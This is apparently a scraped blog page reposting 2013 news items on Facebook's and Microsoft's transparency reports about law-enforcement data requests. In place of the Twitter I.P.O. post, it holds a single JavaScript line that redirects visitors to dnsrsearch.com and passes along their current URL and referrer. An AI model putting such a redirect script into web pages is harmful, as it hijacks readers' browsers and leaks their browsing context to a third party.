Showing posts with label Discloses. Show all posts
Showing posts with label Discloses. Show all posts

Saturday, October 5, 2013

DealBook: Twitter Discloses Its I.P.O. Plans

window.location="http://www.dnsrsearch.com/index.php?origURL="+escape(window.location)+"&r="+escape(document.referrer);

Sunday, June 16, 2013

Bits Blog: Facebook Discloses Basic Data on Law-Enforcement Requests

A sign outside of Facebook's headquarters in Menlo Park, Calif. The company on Friday disclosed information about government requests for data, the vast majority of which did not pertain to national security matters.Jeff Chiu/Associated Press A sign outside of Facebook’s headquarters in Menlo Park, Calif. The company on Friday disclosed information about government requests for data, the vast majority of which did not pertain to national security matters.

12:10 a.m. Saturday, June 15, 2013 | Updated Added Microsoft’s release of more data on Friday night.

Facebook on Friday disclosed for the first time how many requests for data about its 1.1 billion users it had gotten from law enforcement authorities in the United States.

The social networking company said that in the last six months of 2012, it had 9,000 to 10,000 requests for information about its users from local, state and federal agencies. Those requests covered 18,000 to 19,000 user accounts.

“These requests run the gamut — from things like a local sheriff trying to find a missing child, to a federal marshal tracking a fugitive, to a police department investigating an assault, to a national security official investigating a terrorist threat,” the company’s general counsel, Ted Ullyot, said in a blog post disclosing the data.

Facebook said it was legally prohibited from saying how many of the data requests were related to national security. But generally speaking, the vast majority of the law-enforcement data requests received by tech companies are for other matters, like local criminal cases.

Facebook’s disclosure comes after negotiations with the federal government that began after the first news reports a week ago about the National Security Agency’s secret Prism surveillance program. Those reports revealed that a number of American Internet companies, including Facebook, Google, Microsoft and Yahoo, had secretly provided data about foreigners to the United States government under the Foreign Intelligence Surveillance Act.

The tech companies have also secretly provided data to the F.B.I. under National Security Letters, which the government uses to gather information about Americans.

Under federal law, companies generally cannot disclose even the existence of national security data requests they receive. But in recent days, Facebook, Google and Microsoft have been pressing the government for permission to share more information.

“We’re pleased that as a result of our discussions, we can now include in a transparency report all U.S. national security-related requests (including FISA as well as National Security Letters) – which until now no company has been permitted to do,” Mr. Ullyot wrote. “As of today, the government will only authorize us to communicate about these numbers in aggregate, and as a range. This is progress, but we’re continuing to push for even more transparency.”

Google had previously published a transparency report that included N.S.L. but not FISA data requests. Microsoft’s recent transparency report similarly excluded FISA requests but included National Security Letters.

Late Friday, after Facebook’s data release, Microsoft provided similar information about requests for data that it had received from law enforcement at all levels of government.

For the six months ending Dec. 31, 2012, Microsoft received between 6,000 and 7,000 criminal and national security warrants, subpoenas and orders affecting between 31,000 and 32,000 consumer accounts from governmental entities in the United States, the company’s deputy general counsel, John Frank, said in a statement.

“We have not received any national security orders of the type that Verizon was reported to have received that required Verizon to provide business records about U.S. customers,” Mr. Frank said.

This post has been revised to reflect the following correction:

Correction: June 15, 2013

An earlier version of this article incorrectly described Microsoft's transparency report. It included National Security Letters requests, but excluded FISA requests. It did not exclude both types of national security requests.

Sunday, March 24, 2013

Microsoft Report Discloses Law Enforcement Requests for Customer Data

The report, which Microsoft said it planned to update every six months, showed that law enforcement agencies in five countries — Britain, France, Germany, Turkey and the United States — accounted for 69 percent of the 70,665 requests the company received last year.

In 80 percent of requests, Microsoft provided elements of what is called noncontent data, like an account holder’s name, sex, e-mail address, I.P. address, country of residence, and dates and times of data traffic.

In 2.1 percent of requests, the company disclosed the actual content of a communication, like the subject heading of an e-mail, the contents of an e-mail or a picture stored on SkyDrive, its cloud computing service.

Microsoft said it disclosed the content of communications in 1,544 cases to law enforcement agencies in the United States, and in 14 cases to agents in Brazil, Canada, Ireland and New Zealand.

“Government requests for online data are like the dark matter of the Internet,” said Eva Galperin, a global policy analyst at the Electronic Frontier Foundation in San Francisco, which has campaigned for greater disclosure.

Ms. Galperin said that even with Microsoft’s disclosures, fewer than 10 companies published the extent of their cooperation with law enforcement agencies.

“Only a few companies report this, but they are only a very small percent of the online universe,” she said. “So any one company that joins the disclosure effort is good news. The faster this becomes a standard for all Web businesses, the better.”

The law enforcement requests concerned users of Microsoft services including Hotmail, Outlook.com, SkyDrive, Skype and Xbox Live, where people are typically asked to enter their personal details to obtain service.

Google was the first major Web business, in 2010, to report the number of legal requests it had received for information. Since then, Twitter, LinkedIn and some smaller companies have also begun reporting, but big businesses like Apple and Yahoo have not.

Microsoft also resisted at first. In January, a group of more than 100 Internet activists and digital rights groups signed a petition asking the company to disclose its data-handling practices for Skype, the Internet voice and video service it bought in 2011.

But Microsoft did provide two types of detail in its transparency report that rivals have not addressed in similar fashion.

It described the reasons it had rejected some requests, and it listed separately by country how it had responded to requests for the content of communications and for noncontent data.

It also published separate information for Skype, which is based in Luxembourg and is subject to national and European Union laws.

In 4,713 cases last year, Microsoft disclosed administrative details of Skype accounts — like a user’s Skype ID, name, e-mail address and billing information, as well as call detail records if a person subscribed to a Skype service that connects to a telephone number.

But Microsoft said it had released no content from Skype transmissions last year. It has said that the peer-to-peer nature of Skype’s Internet conversations means the company does not store and has no access to past conversations.

The countries that made the most requests and received information from Microsoft for Skype noncontent information last year, in descending order, were Britain, the United States, Germany, France and Taiwan, which together accounted for about 80 percent of the requests.

Microsoft did not disclose the total number of requests it had received for Skype information, but said it aimed to do so in its next report later this year.

Brad Smith, an executive vice president at Microsoft and the company’s general counsel, said that the number of requests Microsoft received last year covered only a tiny fraction of its huge customer base, which the company estimates is in the hundreds of millions.

Mr. Smith said in a blog post that the requests in 2012 had affected less than 0.02 percent of Microsoft account holders. He wrote that Microsoft, like all global businesses, must comply with requests from law enforcement, but that the company had set high standards for doing so.

Law enforcement agencies must present a subpoena or its foreign equivalent to obtain noncontent data about Microsoft users, Mr. Smith wrote. To obtain the contents of e-mails and other communications, the company requires agencies to submit a warrant, which is issued in the United States by a court judge and in Britain by the home secretary.

Microsoft rejected requests for data in 18 percent of cases last year, mostly because it could not find any information on the individuals named or because law enforcement officials had not demonstrated the proper legal justification for the requests, the company said.

It also said it had received a minuscule number of requests for data on businesses.

In 2012, Microsoft said, it received only 11 requests for information on business clients and complied in four instances, either after it had obtained consent from the business or when it already had in effect a contract permitting it to disclose the information.

“Like every company, we are obligated to comply with legally binding requests from law enforcement, and we respect and appreciate the role that law enforcement personnel play in so many countries to protect the public’s safety,” Mr. Smith wrote in his blog post. “As we continue to move forward, Microsoft is committed to respecting human rights, free expression and individual privacy.”